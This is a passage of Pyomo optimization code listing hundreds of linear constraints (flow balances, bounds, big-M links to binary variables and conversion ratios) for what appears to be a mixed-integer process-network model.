m.x103 - 0.3*m.x208 == 0) m.c104 = Constraint(expr= m.x104 - 0.9*m.x209 == 0) m.c105 = Constraint(expr= m.x105 - 0.9*m.x210 == 0) m.c106 = Constraint(expr= m.x106 - 0.9*m.x211 == 0) m.c107 = Constraint(expr= m.x77 >= 1.2) m.c108 = Constraint(expr= m.x78 >= 1.15) m.c109 = Constraint(expr= m.x79 >= 1.1) m.c110 = Constraint(expr= m.x83 >= 1.2) m.c111 = Constraint(expr= m.x84 >= 1.15) m.c112 = Constraint(expr= m.x85 >= 1.1) m.c113 = Constraint(expr= m.x95 >= 1.1) m.c114 = Constraint(expr= m.x96 >= 1.1) m.c115 = Constraint(expr= m.x97 >= 1.1) m.c116 = Constraint(expr= m.x98 >= 1.1) m.c117 = Constraint(expr= m.x99 >= 1.1) m.c118 = Constraint(expr= m.x100 >= 1.1) m.c119 = Constraint(expr= m.x101 >= 1.4) m.c120 = Constraint(expr= m.x102 >= 1.3) m.c121 = Constraint(expr= m.x103 >= 1.2) m.c122 = Constraint(expr= m.x104 >= 1.3) m.c123 = Constraint(expr= m.x105 >= 1.2) m.c124 = Constraint(expr= m.x106 >= 1.1) m.c125 = Constraint(expr= m.x2 <= 55) m.c126 = Constraint(expr= m.x3 <= 40) m.c127 = Constraint(expr= m.x4 <= 40) m.c128 = Constraint(expr= m.x17 <= 46) m.c129 = Constraint(expr= m.x18 <= 41) m.c130 = Constraint(expr= m.x19 <= 50) m.c131 = Constraint(expr= m.x29 <= 45) m.c132 = Constraint(expr= m.x30 <= 62) m.c133 = Constraint(expr= m.x31 <= 42) m.c134 = Constraint(expr= m.x65 <= 54) m.c135 = Constraint(expr= m.x66 <= 51) m.c136 = Constraint(expr= m.x67 <= 50) m.c137 = Constraint(expr= m.x86 <= 40) m.c138 = Constraint(expr= m.x87 <= 45) m.c139 = Constraint(expr= m.x88 <= 41) m.c140 = Constraint(expr= m.x2 - m.x5 - m.x8 == 0) m.c141 = Constraint(expr= m.x3 - m.x6 - m.x9 == 0) m.c142 = Constraint(expr= m.x4 - m.x7 - m.x10 == 0) m.c143 = Constraint(expr= m.x11 - m.x14 == 0) m.c144 = Constraint(expr= m.x12 - m.x15 == 0) m.c145 = Constraint(expr= m.x13 - m.x16 == 0) m.c146 = Constraint(expr= m.x17 - m.x20 + m.x35 == 0) m.c147 = Constraint(expr= m.x18 - m.x21 + m.x36 == 0) m.c148 = Constraint(expr= m.x19 - m.x22 + m.x37 == 0) m.c149 = Constraint(expr= m.x23 - m.x26 + m.x38 == 0) m.c150 = Constraint(expr= m.x24 - m.x27 + m.x39 == 0) m.c151 = Constraint(expr= m.x25 - m.x28 + m.x40 == 0) m.c152 = Constraint(expr= m.x29 - m.x32 - m.x41 == 0) m.c153 = Constraint(expr= m.x30 - m.x33 - m.x42 == 0) m.c154 = Constraint(expr= m.x31 - m.x34 - m.x43 == 0) m.c155 = Constraint(expr= m.x44 - m.x47 - m.x50 == 0) m.c156 = Constraint(expr= m.x45 - m.x48 - m.x51 == 0) m.c157 = Constraint(expr= m.x46 - m.x49 - m.x52 == 0) m.c158 = Constraint(expr= m.x53 - m.x59 == 0) m.c159 = Constraint(expr= m.x54 - m.x60 == 0) m.c160 = Constraint(expr= m.x55 - m.x61 == 0) m.c161 = Constraint(expr= m.x56 - m.x62 == 0) m.c162 = Constraint(expr= m.x57 - m.x63 == 0) m.c163 = Constraint(expr= m.x58 - m.x64 == 0) m.c164 = Constraint(expr= m.x65 - m.x68 - m.x71 == 0) m.c165 = Constraint(expr= m.x66 - m.x69 - m.x72 == 0) m.c166 = Constraint(expr= m.x67 - m.x70 - m.x73 == 0) m.c167 = Constraint(expr= m.x74 - m.x77 == 0) m.c168 = Constraint(expr= m.x75 - m.x78 == 0) m.c169 = Constraint(expr= m.x76 - m.x79 == 0) m.c170 = Constraint(expr= m.x80 - m.x83 == 0) m.c171 = Constraint(expr= m.x81 - m.x84 == 0) m.c172 = Constraint(expr= m.x82 - m.x85 == 0) m.c173 = Constraint(expr= m.x86 - m.x89 == 0) m.c174 = Constraint(expr= m.x87 - m.x90 == 0) m.c175 = Constraint(expr= m.x88 - m.x91 == 0) m.c176 = Constraint(expr= m.x5 - m.x11 - m.x212 == 0) m.c177 = Constraint(expr= m.x6 - m.x12 - m.x213 == 0) m.c178 = Constraint(expr= m.x7 - m.x13 - m.x214 == 0) m.c179 = Constraint(expr= m.x8 + m.x20 - m.x23 - m.x215 == 0) m.c180 = Constraint(expr= m.x9 + m.x21 - m.x24 - m.x216 == 0) m.c181 = Constraint(expr= m.x10 + m.x22 - m.x25 - m.x217 == 0) m.c182 = Constraint(expr= m.x32 - m.x35 - m.x38 - m.x218 == 0) m.c183 = Constraint(expr= m.x33 - m.x36 - m.x39 - m.x219 == 0) m.c184 = Constraint(expr= m.x34 - m.x37 - m.x40 - m.x220 == 0) m.c185 = Constraint(expr= m.x41 - m.x44 - m.x221 == 0) m.c186 = Constraint(expr= m.x42 - m.x45 - m.x222 == 0) m.c187 = Constraint(expr= m.x43 - m.x46 - m.x223 == 0) m.c188 = Constraint(expr= m.x50 - m.x53 - m.x56 - m.x224 == 0) m.c189 = Constraint(expr= m.x51 - m.x54 - m.x57 - m.x225 == 0) m.c190 = Constraint(expr= m.x52 - m.x55 - m.x58 - m.x226 == 0) m.c191 = Constraint(expr= m.x47 + m.x68 - m.x74 - m.x227 == 0) m.c192 = Constraint(expr= m.x48 + m.x69 - m.x75 - m.x228 == 0) m.c193 = Constraint(expr= m.x49 + m.x70 - m.x76 - m.x229 == 0) m.c194 = Constraint(expr= m.x71 - m.x80 + m.x92 - m.x230 == 0) m.c195 = Constraint(expr= m.x72 - m.x81 + m.x93 - m.x231 == 0) m.c196 = Constraint(expr= m.x73 - m.x82 + m.x94 - m.x232 == 0) m.c197 = Constraint(expr= m.x89 - m.x92 - m.x233 == 0) m.c198 = Constraint(expr= m.x90 - m.x93 - m.x234 == 0) m.c199 = Constraint(expr= m.x91 - m.x94 - m.x235 == 0) m.c200 = Constraint(expr= m.x113 - m.x125 <= 0) m.c201 = Constraint(expr= m.x114 - m.x126 <= 0) m.c202 = Constraint(expr= m.x115 - m.x127 <= 0) m.c203 = Constraint(expr= m.x152 - m.x173 <= 0) m.c204 = Constraint(expr= m.x153 - m.x174 <= 0) m.c205 = Constraint(expr= m.x154 - m.x175 <= 0) m.c206 = Constraint(expr= m.x176 - m.x197 <= 0) m.c207 = Constraint(expr= m.x177 - m.x198 <= 0) m.c208 = Constraint(expr= m.x178 - m.x199 <= 0) m.c209 = Constraint(expr= m.x116 - m.x416 - m.x419 - m.x422 - m.x425 == 0) m.c210 = Constraint(expr= m.x117 - m.x417 - m.x420 - m.x423 - m.x426 == 0) m.c211 = Constraint(expr= m.x118 - m.x418 - m.x421 - m.x424 - m.x427 == 0) m.c212 = Constraint(expr= m.x110 - m.x392 - m.x395 - m.x398 - m.x401 == 0) m.c213 = Constraint(expr= m.x111 - m.x393 - m.x396 - m.x399 - m.x402 == 0) m.c214 = Constraint(expr= m.x112 - m.x394 - m.x397 - m.x400 - m.x403 == 0) m.c215 = Constraint(expr= m.x128 - m.x428 - m.x431 - m.x434 - m.x437 == 0) m.c216 = Constraint(expr= m.x129 - m.x429 - m.x432 - m.x435 - m.x438 == 0) m.c217 = Constraint(expr= m.x130 - m.x430 - m.x433 - m.x436 - m.x439 == 0) m.c218 = Constraint(expr= m.x113 - m.x404 - m.x407 - m.x410 - m.x413 == 0) m.c219 = Constraint(expr= m.x114 - m.x405 - m.x408 - m.x411 - m.x414 == 0) m.c220 = Constraint(expr= m.x115 - m.x406 - m.x409 - m.x412 - m.x415 == 0) m.c221 = Constraint(expr= m.x140 - m.x452 - m.x455 - m.x458 - m.x461 == 0) m.c222 = Constraint(expr= m.x141 - m.x453 - m.x456 - m.x459 - m.x462 == 0) m.c223 = Constraint(expr= m.x142 - m.x454 - m.x457 - m.x460 - m.x463 == 0) m.c224 = Constraint(expr= m.x143 - m.x464 - m.x467 - m.x470 - m.x473 == 0) m.c225 = Constraint(expr= m.x144 - m.x465 - m.x468 - m.x471 - m.x474 == 0) m.c226 = Constraint(expr= m.x145 - m.x466 - m.x469 - m.x472 - m.x475 == 0) m.c227 = Constraint(expr= m.x137 - m.x440 - m.x443 - m.x446 - m.x449 == 0) m.c228 = Constraint(expr= m.x138 - m.x441 - m.x444 - m.x447 - m.x450 == 0) m.c229 = Constraint(expr= m.x139 - m.x442 - m.x445 - m.x448 - m.x451 == 0) m.c230 = Constraint(expr= m.x149 - m.x488 - m.x491 - m.x494 - m.x497 == 0) m.c231 = Constraint(expr= m.x150 - m.x489 - m.x492 - m.x495 - m.x498 == 0) m.c232 = Constraint(expr= m.x151 - m.x490 - m.x493 - m.x496 - m.x499 == 0) m.c233 = Constraint(expr= m.x146 - m.x476 - m.x479 - m.x482 - m.x485 == 0) m.c234 = Constraint(expr= m.x147 - m.x477 - m.x480 - m.x483 - m.x486 == 0) m.c235 = Constraint(expr= m.x148 - m.x478 - m.x481 - m.x484 - m.x487 == 0) m.c236 = Constraint(expr= m.x158 - m.x524 - m.x527 - m.x530 - m.x533 == 0) m.c237 = Constraint(expr= m.x159 - m.x525 - m.x528 - m.x531 - m.x534 == 0) m.c238 = Constraint(expr= m.x160 - m.x526 - m.x529 - m.x532 - m.x535 == 0) m.c239 = Constraint(expr= m.x161 - m.x536 - m.x539 - m.x542 - m.x545 == 0) m.c240 = Constraint(expr= m.x162 - m.x537 - m.x540 - m.x543 - m.x546 == 0) m.c241 = Constraint(expr= m.x163 - m.x538 - m.x541 - m.x544 - m.x547 == 0) m.c242 = Constraint(expr= m.x155 - m.x512 - m.x515 - m.x518 - m.x521 == 0) m.c243 = Constraint(expr= m.x156 - m.x513 - m.x516 - m.x519 - m.x522 == 0) m.c244 = Constraint(expr= m.x157 - m.x514 - m.x517 - m.x520 - m.x523 == 0) m.c245 = Constraint(expr= m.x179 - m.x560 - m.x563 - m.x566 - m.x569 == 0) m.c246 = Constraint(expr= m.x180 - m.x561 - m.x564 - m.x567 - m.x570 == 0) m.c247 = Constraint(expr= m.x181 - m.x562 - m.x565 - m.x568 - m.x571 == 0) m.c248 = Constraint(expr= m.x152 - m.x500 - m.x503 - m.x506 - m.x509 == 0) m.c249 = Constraint(expr= m.x153 - m.x501 - m.x504 - m.x507 - m.x510 == 0) m.c250 = Constraint(expr= m.x154 - m.x502 - m.x505 - m.x508 - m.x511 == 0) m.c251 = Constraint(expr= m.x185 - m.x572 - m.x575 - m.x578 - m.x581 == 0) m.c252 = Constraint(expr= m.x186 - m.x573 - m.x576 - m.x579 - m.x582 == 0) m.c253 = Constraint(expr= m.x187 - m.x574 - m.x577 - m.x580 - m.x583 == 0) m.c254 = Constraint(expr= m.x176 - m.x548 - m.x551 - m.x554 - m.x557 == 0) m.c255 = Constraint(expr= m.x177 - m.x549 - m.x552 - m.x555 - m.x558 == 0) m.c256 = Constraint(expr= m.x178 - m.x550 - m.x553 - m.x556 - m.x559 == 0) m.c257 = Constraint(expr= m.x197 - m.x596 - m.x599 - m.x602 - m.x605 == 0) m.c258 = Constraint(expr= m.x198 - m.x597 - m.x600 - m.x603 - m.x606 == 0) m.c259 = Constraint(expr= m.x199 - m.x598 - m.x601 - m.x604 - m.x607 == 0) m.c260 = Constraint(expr= m.x194 - m.x584 - m.x587 - m.x590 - m.x593 == 0) m.c261 = Constraint(expr= m.x195 - m.x585 - m.x588 - m.x591 - m.x594 == 0) m.c262 = Constraint(expr= m.x196 - m.x586 - m.x589 - m.x592 - m.x595 == 0) m.c263 = Constraint(expr= m.x416 - 233.75*m.b704 <= 0) m.c264 = Constraint(expr= m.x417 - 170*m.b705 <= 0) m.c265 = Constraint(expr= m.x418 - 170*m.b706 <= 0) m.c266 = Constraint(expr= m.x419 - 233.75*m.b707 <= 0) m.c267 = Constraint(expr= m.x420 - 170*m.b708 <= 0) m.c268 = Constraint(expr= m.x421 - 170*m.b709 <= 0) m.c269 = Constraint(expr= m.x422 - 233.75*m.b710 <= 0) m.c270 = Constraint(expr= m.x423 - 170*m.b711 <= 0) m.c271 = Constraint(expr= m.x424 - 170*m.b712 <= 0) m.c272 = Constraint(expr= m.x425 - 233.75*m.b713 <= 0) m.c273 = Constraint(expr= m.x426 - 170*m.b714 <= 0) m.c274 = Constraint(expr= m.x427 - 170*m.b715 <= 0) m.c275 = Constraint(expr= m.x428 - 383.5625*m.b716 <= 0) m.c276 = Constraint(expr= m.x429 - 316.001666666667*m.b717 <= 0) m.c277 = Constraint(expr= m.x430 - 317.585*m.b718 <= 0) m.c278 = Constraint(expr= m.x431 - 383.5625*m.b719 <= 0) m.c279 = Constraint(expr= m.x432 - 316.001666666667*m.b720 <= 0) m.c280 = Constraint(expr= m.x433 - 317.585*m.b721 <= 0) m.c281 = Constraint(expr= m.x434 - 383.5625*m.b722 <= 0) m.c282 = Constraint(expr= m.x435 - 316.001666666667*m.b723 <= 0) m.c283 = Constraint(expr= m.x436 - 317.585*m.b724 <= 0) m.c284 = Constraint(expr= m.x437 - 383.5625*m.b725 <= 0) m.c285 = Constraint(expr= m.x438 - 316.001666666667*m.b726 <= 0) m.c286 = Constraint(expr= m.x439 - 317.585*m.b727 <= 0) m.c287 = Constraint(expr= m.x452 - 36.75*m.b728 <= 0) m.c288 = Constraint(expr= m.x453 - 50.6333333333333*m.b729 <= 0) m.c289 = Constraint(expr= m.x454 - 34.3*m.b730 <= 0) m.c290 = Constraint(expr= m.x455 - 36.75*m.b731 <= 0) m.c291 = Constraint(expr= m.x456 - 50.6333333333333*m.b732 <= 0) m.c292 = Constraint(expr= m.x457 - 34.3*m.b733 <= 0) m.c293 = Constraint(expr= m.x458 - 36.75*m.b734 <= 0) m.c294 = Constraint(expr= m.x459 - 50.6333333333333*m.b735 <= 0) m.c295 = Constraint(expr= m.x460 - 34.3*m.b736 <= 0) m.c296 = Constraint(expr= m.x461 - 36.75*m.b737 <= 0) m.c297 = Constraint(expr= m.x462 - 50.6333333333333*m.b738 <= 0) m.c298 = Constraint(expr= m.x463 - 34.3*m.b739 <= 0) m.c299 = Constraint(expr= m.x464 - 36.75*m.b728 <= 0) m.c300 = Constraint(expr= m.x465 - 50.6333333333333*m.b729 <= 0) m.c301 = Constraint(expr= m.x466 - 34.3*m.b730 <= 0) m.c302 = Constraint(expr= m.x467 - 36.75*m.b731 <= 0) m.c303 = Constraint(expr= m.x468 - 50.6333333333333*m.b732 <= 0) m.c304 = Constraint(expr= m.x469 - 34.3*m.b733 <= 0) m.c305 = Constraint(expr= m.x470 - 36.75*m.b734 <= 0) m.c306 = Constraint(expr= m.x471 - 50.6333333333333*m.b735 <= 0) m.c307 = Constraint(expr= m.x472 - 34.3*m.b736 <= 0) m.c308 = Constraint(expr= m.x473 - 36.75*m.b737 <= 0) m.c309 = Constraint(expr= m.x474 - 50.6333333333333*m.b738 <= 0) m.c310 = Constraint(expr= m.x475 - 34.3*m.b739 <= 0) m.c311 = Constraint(expr= m.x488 - 33.75*m.b740 <= 0) m.c312 = Constraint(expr= m.x489 - 46.5*m.b741 <= 0) m.c313 = Constraint(expr= m.x490 - 31.5*m.b742 <= 0) m.c314 = Constraint(expr= m.x491 - 33.75*m.b743 <= 0) m.c315 = Constraint(expr= m.x492 - 46.5*m.b744 <= 0) m.c316 = Constraint(expr= m.x493 - 31.5*m.b745 <= 0) m.c317 = Constraint(expr= m.x494 - 33.75*m.b746 <= 0) m.c318 = Constraint(expr= m.x495 - 46.5*m.b747 <= 0) m.c319 = Constraint(expr= m.x496 - 31.5*m.b748 <= 0) m.c320 = Constraint(expr= m.x497 - 33.75*m.b749 <= 0) m.c321 = Constraint(expr= m.x498 - 46.5*m.b750 <= 0) m.c322 = Constraint(expr= m.x499 - 31.5*m.b751 <= 0) m.c323 = Constraint(expr= m.x524 - 32.0625*m.b752 <= 0) m.c324 = Constraint(expr= m.x525 - 44.175*m.b753 <= 0) m.c325 = Constraint(expr= m.x526 - 29.925*m.b754 <= 0) m.c326 = Constraint(expr= m.x527 - 32.0625*m.b755 <= 0) m.c327 = Constraint(expr= m.x528 - 44.175*m.b756 <= 0) m.c328 = Constraint(expr= m.x529 - 29.925*m.b757 <= 0) m.c329 = Constraint(expr= m.x530 - 32.0625*m.b758 <= 0) m.c330 = Constraint(expr= m.x531 - 44.175*m.b759 <= 0) m.c331 = Constraint(expr= m.x532 - 29.925*m.b760 <= 0) m.c332 = Constraint(expr= m.x533 - 32.0625*m.b761 <= 0) m.c333 = Constraint(expr= m.x534 - 44.175*m.b762 <= 0) m.c334 = Constraint(expr= m.x535 - 29.925*m.b763 <= 0) m.c335 = Constraint(expr= m.x536 - 32.0625*m.b752 <= 0) m.c336 = Constraint(expr= m.x537 - 44.175*m.b753 <= 0) m.c337 = Constraint(expr= m.x538 - 29.925*m.b754 <= 0) m.c338 = Constraint(expr= m.x539 - 32.0625*m.b755 <= 0) m.c339 = Constraint(expr= m.x540 - 44.175*m.b756 <= 0) m.c340 = Constraint(expr= m.x541 - 29.925*m.b757 <= 0) m.c341 = Constraint(expr= m.x542 - 32.0625*m.b758 <= 0) m.c342 = Constraint(expr= m.x543 - 44.175*m.b759 <= 0) m.c343 = Constraint(expr= m.x544 - 29.925*m.b760 <= 0) m.c344 = Constraint(expr= m.x545 - 32.0625*m.b761 <= 0) m.c345 = Constraint(expr= m.x546 - 44.175*m.b762 <= 0) m.c346 = Constraint(expr= m.x547 - 29.925*m.b763 <= 0) m.c347 = Constraint(expr= m.x560 - 143.4375*m.b764 <= 0) m.c348 = Constraint(expr= m.x561 - 147.9*m.b765 <= 0) m.c349 = Constraint(expr= m.x562 - 133.025*m.b766 <= 0) m.c350 = Constraint(expr= m.x563 - 143.4375*m.b767 <= 0) m.c351 = Constraint(expr= m.x564 - 147.9*m.b768 <= 0) m.c352 = Constraint(expr= m.x565 - 133.025*m.b769 <= 0) m.c353 = Constraint(expr= m.x566 - 143.4375*m.b770 <= 0) m.c354 = Constraint(expr= m.x567 - 147.9*m.b771 <= 0) m.c355 = Constraint(expr= m.x568 - 133.025*m.b772 <= 0) m.c356 = Constraint(expr= m.x569 - 143.4375*m.b773 <= 0) m.c357 = Constraint(expr= m.x570 - 147.9*m.b774 <= 0) m.c358 = Constraint(expr= m.x571 - 133.025*m.b775 <= 0) m.c359 = Constraint(expr= m.x572 - 178.192857142857*m.b776 <= 0) m.c360 = Constraint(expr= m.x573 - 177.310714285714*m.b777 <= 0) m.c361 = Constraint(expr= m.x574 - 169.941428571429*m.b778 <= 0) m.c362 = Constraint(expr= m.x575 - 178.192857142857*m.b779 <= 0) m.c363 = Constraint(expr= m.x576 - 177.310714285714*m.b780 <= 0) m.c364 = Constraint(expr= m.x577 - 169.941428571429*m.b781 <= 0) m.c365 = Constraint(expr= m.x578 - 178.192857142857*m.b782 <= 0) m.c366 = Constraint(expr= m.x579 - 177.310714285714*m.b783 <= 0) m.c367 = Constraint(expr= m.x580 - 169.941428571429*m.b784 <= 0) m.c368 = Constraint(expr= m.x581 - 178.192857142857*m.b785 <= 0) m.c369 = Constraint(expr= m.x582 - 177.310714285714*m.b786 <= 0) m.c370 = Constraint(expr= m.x583 - 169.941428571429*m.b787 <= 0) m.c371 = Constraint(expr= m.x596 - 52.5714285714286*m.b788 <= 0) m.c372 = Constraint(expr= m.x597 - 59.1428571428572*m.b789 <= 0) m.c373 = Constraint(expr= m.x598 - 53.8857142857143*m.b790 <= 0) m.c374 = Constraint(expr= m.x599 - 52.5714285714286*m.b791 <= 0) m.c375 = Constraint(expr= m.x600 - 59.1428571428572*m.b792 <= 0) m.c376 = Constraint(expr= m.x601 - 53.8857142857143*m.b793 <= 0) m.c377 = Constraint(expr= m.x602 - 52.5714285714286*m.b794 <= 0) m.c378 = Constraint(expr= m.x603 - 59.1428571428572*m.b795 <= 0) m.c379 = Constraint(expr= m.x604 - 53.8857142857143*m.b796 <= 0) m.c380 = Constraint(expr= m.x605 - 52.5714285714286*m.b797 <= 0) m.c381 = Constraint(expr= m.x606 - 59.1428571428572*m.b798 <= 0) m.c382 = Constraint(expr= m.x607 - 53.8857142857143*m.b799 <= 0) m.c383 = Constraint(expr= m.x392 - 275*m.b704 <= 0) m.c384 = Constraint(expr= m.x393 - 200*m.b705 <= 0) m.c385 = Constraint(expr= m.x394 - 200*m.b706 <= 0) m.c386 = Constraint(expr= m.x395 - 275*m.b707 <= 0) m.c387 = Constraint(expr= m.x396 - 200*m.b708 <= 0) m.c388 = Constraint(expr= m.x397 - 200*m.b709 <= 0) m.c389 = Constraint(expr= m.x398 - 275*m.b710 <= 0) m.c390 = Constraint(expr= m.x399 - 200*m.b711 <= 0) m.c391 = Constraint(expr= m.x400 - 200*m.b712 <= 0) m.c392 = Constraint(expr= m.x401 - 275*m.b713 <= 0) m.c393 = Constraint(expr= m.x402 - 200*m.b714 <= 0) m.c394 = Constraint(expr= m.x403 - 200*m.b715 <= 0) m.c395 = Constraint(expr= m.x404 - 275*m.b716 <= 0) m.c396 = Constraint(expr= m.x405 - 200*m.b717 <= 0) m.c397 = Constraint(expr= m.x406 - 200*m.b718 <= 0) m.c398 = Constraint(expr= m.x407 - 275*m.b719 <= 0) m.c399 = Constraint(expr= m.x408 - 200*m.b720 <= 0) m.c400 = Constraint(expr= m.x409 - 200*m.b721 <= 0) m.c401 = Constraint(expr= m.x410 - 275*m.b722 <= 0) m.c402 = Constraint(expr= m.x411 - 200*m.b723 <= 0) m.c403 = Constraint(expr= m.x412 - 200*m.b724 <= 0) m.c404 = Constraint(expr= m.x413 - 275*m.b725 <= 0) m.c405 = Constraint(expr= m.x414 - 200*m.b726 <= 0) m.c406 = Constraint(expr= m.x415 - 200*m.b727 <= 0) m.c407 = Constraint(expr= m.x440 - 37.5*m.b728 <= 0) m.c408 = Constraint(expr= m.x441 - 51.6666666666667*m.b729 <= 0) m.c409 = Constraint(expr= m.x442 - 35*m.b730 <= 0) m.c410 = Constraint(expr= m.x443 - 37.5*m.b731 <= 0) m.c411 = Constraint(expr= m.x444 - 51.6666666666667*m.b732 <= 0) m.c412 = Constraint(expr= m.x445 - 35*m.b733 <= 0) m.c413 = Constraint(expr= m.x446 - 37.5*m.b734 <= 0) m.c414 = Constraint(expr= m.x447 - 51.6666666666667*m.b735 <= 0) m.c415 = Constraint(expr= m.x448 - 35*m.b736 <= 0) m.c416 = Constraint(expr= m.x449 - 37.5*m.b737 <= 0) m.c417 = Constraint(expr= m.x450 - 51.6666666666667*m.b738 <= 0) m.c418 = Constraint(expr= m.x451 - 35*m.b739 <= 0) m.c419 = Constraint(expr= m.x476 - 37.5*m.b740 <= 0) m.c420 = Constraint(expr= m.x477 - 51.6666666666667*m.b741 <= 0) m.c421 = Constraint(expr= m.x478 - 35*m.b742 <= 0) m.c422 = Constraint(expr= m.x479 - 37.5*m.b743 <= 0) m.c423 = Constraint(expr= m.x480 - 51.6666666666667*m.b744 <= 0) m.c424 = Constraint(expr= m.x481 - 35*m.b745 <= 0) m.c425 = Constraint(expr= m.x482 - 37.5*m.b746 <= 0) m.c426 = Constraint(expr= m.x483 - 51.6666666666667*m.b747 <= 0) m.c427 = Constraint(expr= m.x484 - 35*m.b748 <= 0) m.c428 = Constraint(expr= m.x485 - 37.5*m.b749 <= 0) m.c429 = Constraint(expr= m.x486 - 51.6666666666667*m.b750 <= 0) m.c430 = Constraint(expr= m.x487 - 35*m.b751 <= 0) m.c431 = Constraint(expr= m.x512 - 33.75*m.b752 <= 0) m.c432 = Constraint(expr= m.x513 - 46.5*m.b753 <= 0) m.c433 = Constraint(expr= m.x514 - 31.5*m.b754 <= 0) m.c434 = Constraint(expr= m.x515 - 33.75*m.b755 <= 0) m.c435 = Constraint(expr= m.x516 - 46.5*m.b756 <= 0) m.c436 = Constraint(expr= m.x517 - 31.5*m.b757 <= 0) m.c437 = Constraint(expr= m.x518 - 33.75*m.b758 <= 0) m.c438 = Constraint(expr= m.x519 - 46.5*m.b759 <= 0) m.c439 = Constraint(expr= m.x520 - 31.5*m.b760 <= 0) m.c440 = Constraint(expr= m.x521 - 33.75*m.b761 <= 0) m.c441 = Constraint(expr= m.x522 - 46.5*m.b762 <= 0) m.c442 = Constraint(expr= m.x523 - 31.5*m.b763 <= 0) m.c443 = Constraint(expr= m.x500 - 33.75*m.b764 <= 0) m.c444 = Constraint(expr= m.x501 - 46.5*m.b765 <= 0) m.c445 = Constraint(expr= m.x502 - 31.5*m.b766 <= 0) m.c446 = Constraint(expr= m.x503 - 33.75*m.b767 <= 0) m.c447 = Constraint(expr= m.x504 - 46.5*m.b768 <= 0) m.c448 = Constraint(expr= m.x505 - 31.5*m.b769 <= 0) m.c449 = Constraint(expr= m.x506 - 33.75*m.b770 <= 0) m.c450 = Constraint(expr= m.x507 - 46.5*m.b771 <= 0) m.c451 = Constraint(expr= m.x508 - 31.5*m.b772 <= 0) m.c452 = Constraint(expr= m.x509 - 33.75*m.b773 <= 0) m.c453 = Constraint(expr= m.x510 - 46.5*m.b774 <= 0) m.c454 = Constraint(expr= m.x511 - 31.5*m.b775 <= 0) m.c455 = Constraint(expr= m.x548 - 135*m.b776 <= 0) m.c456 = Constraint(expr= m.x549 - 127.5*m.b777 <= 0) m.c457 = Constraint(expr= m.x550 - 125*m.b778 <= 0) m.c458 = Constraint(expr= m.x551 - 135*m.b779 <= 0) m.c459 = Constraint(expr= m.x552 - 127.5*m.b780 <= 0) m.c460 = Constraint(expr= m.x553 - 125*m.b781 <= 0) m.c461 = Constraint(expr= m.x554 - 135*m.b782 <= 0) m.c462 = Constraint(expr= m.x555 - 127.5*m.b783 <= 0) m.c463 = Constraint(expr= m.x556 - 125*m.b784 <= 0) m.c464 = Constraint(expr= m.x557 - 135*m.b785 <= 0) m.c465 = Constraint(expr= m.x558 - 127.5*m.b786 <= 0) m.c466 = Constraint(expr= m.x559 - 125*m.b787 <= 0) m.c467 = Constraint(expr= m.x584 - 57.1428571428571*m.b788 <= 0) m.c468 = Constraint(expr= m.x585 - 64.2857142857143*m.b789 <= 0) m.c469 = Constraint(expr= m.x586 - 58.5714285714286*m.b790 <= 0) m.c470 = Constraint(expr= m.x587 - 57.1428571428571*m.b791 <= 0) m.c471 = Constraint(expr= m.x588 - 64.2857142857143*m.b792 <= 0) m.c472 = Constraint(expr= m.x589 - 58.5714285714286*m.b793 <= 0) m.c473 = Constraint(expr= m.x590 - 57.1428571428571*m.b794 <= 0) m.c474 = Constraint(expr= m.x591 - 64.2857142857143*m.b795 <= 0) m.c475 = Constraint(expr= m.x592 - 58.5714285714286*m.b796 <= 0) m.c476 = Constraint(expr= m.x593 - 57.1428571428571*m.b797 <= 0) m.c477 = Constraint(expr= m.x594 - 64.2857142857143*m.b798 <= 0) m.c478 = Constraint(expr= m.x595 - 58.5714285714286*m.b799 <= 0) m.c479 = Constraint(expr= - 0.8*m.x392 + m.x416 == 0) m.c480 = Constraint(expr= - 0.8*m.x393 + m.x417 == 0) m.c481 = Constraint(expr= - 0.8*m.x394 + m.x418 == 0) m.c482 = Constraint(expr= - 0.85*m.x395 + m.x419 == 0) m.c483 = Constraint(expr= - 0.85*m.x396 + m.x420 == 0) m.c484 = Constraint(expr= - 0.85*m.x397 + m.x421 == 0) m.c485 = Constraint(expr= - 0.8*m.x398 + m.x422 == 0) m.c486 = Constraint(expr= - 0.8*m.x399 + m.x423 == 0) m.c487 = Constraint(expr= - 0.8*m.x400 + m.x424 == 0) m.c488 = Constraint(expr= - 0.85*m.x401 + m.x425 == 0) m.c489 = Constraint(expr= - 0.85*m.x402 + m.x426 == 0) m.c490 = Constraint(expr= - 0.85*m.x403 + m.x427 == 0) m.c491 = Constraint(expr= - 0.9*m.x404 + m.x428 == 0) m.c492 = Constraint(expr= - 0.9*m.x405 + m.x429 == 0) m.c493 = Constraint(expr= - 0.9*m.x406 + m.x430 == 0) m.c494 = Constraint(expr= - 0.95*m.x407 + m.x431 == 0) m.c495 = Constraint(expr= - 0.95*m.x408 + m.x432 == 0) m.c496 = Constraint(expr= - 0.95*m.x409 + m.x433 == 0) m.c497 = Constraint(expr= - 0.9*m.x410 + m.x434 == 0) m.c498 = Constraint(expr= - 0.9*m.x411 + m.x435 == 0) m.c499 = Constraint(expr= - 0.9*m.x412 + m.x436 == 0) m.c500 = Constraint(expr= - 0.95*m.x413 + m.x437 == 0) m.c501 = Constraint(expr= - 0.95*m.x414 + m.x438 == 0) m.c502 = Constraint(expr= - 0.95*m.x415 + m.x439 == 0) m.c503 = Constraint(expr= - 0.85*m.x440 + m.x452 == 0) m.c504 = Constraint(expr= - 0.85*m.x441 + m.x453 == 0) m.c505 = Constraint(expr= - 0.85*m.x442 + m.x454 == 0) m.c506 = Constraint(expr= - 0.98*m.x443 + m.x455 == 0) m.c507 = Constraint(expr= - 0.98*m.x444 + m.x456 == 0) m.c508 = Constraint(expr= - 0.98*m.x445 + m.x457 == 0) m.c509 = Constraint(expr= - 0.85*m.x446 + m.x458 == 0) m.c510 = Constraint(expr= - 0.85*m.x447 + m.x459 == 0) m.c511 = Constraint(expr= - 0.85*m.x448 + m.x460 == 0) m.c512 = Constraint(expr= - 0.98*m.x449 + m.x461 == 0) m.c513 = Constraint(expr= - 0.98*m.x450 + m.x462 == 0) m.c514 = Constraint(expr= - 0.98*m.x451 + m.x463 == 0) m.c515 = Constraint(expr= - 0.85*m.x440 + m.x464 == 0) m.c516 = Constraint(expr= - 0.85*m.x441 + m.x465 == 0) m.c517 = Constraint(expr= - 0.85*m.x442 + m.x466 == 0) m.c518 = Constraint(expr= - 0.98*m.x443 + m.x467 == 0) m.c519 = Constraint(expr= - 0.98*m.x444 + m.x468 == 0) m.c520 = Constraint(expr= - 0.98*m.x445 + m.x469 == 0) 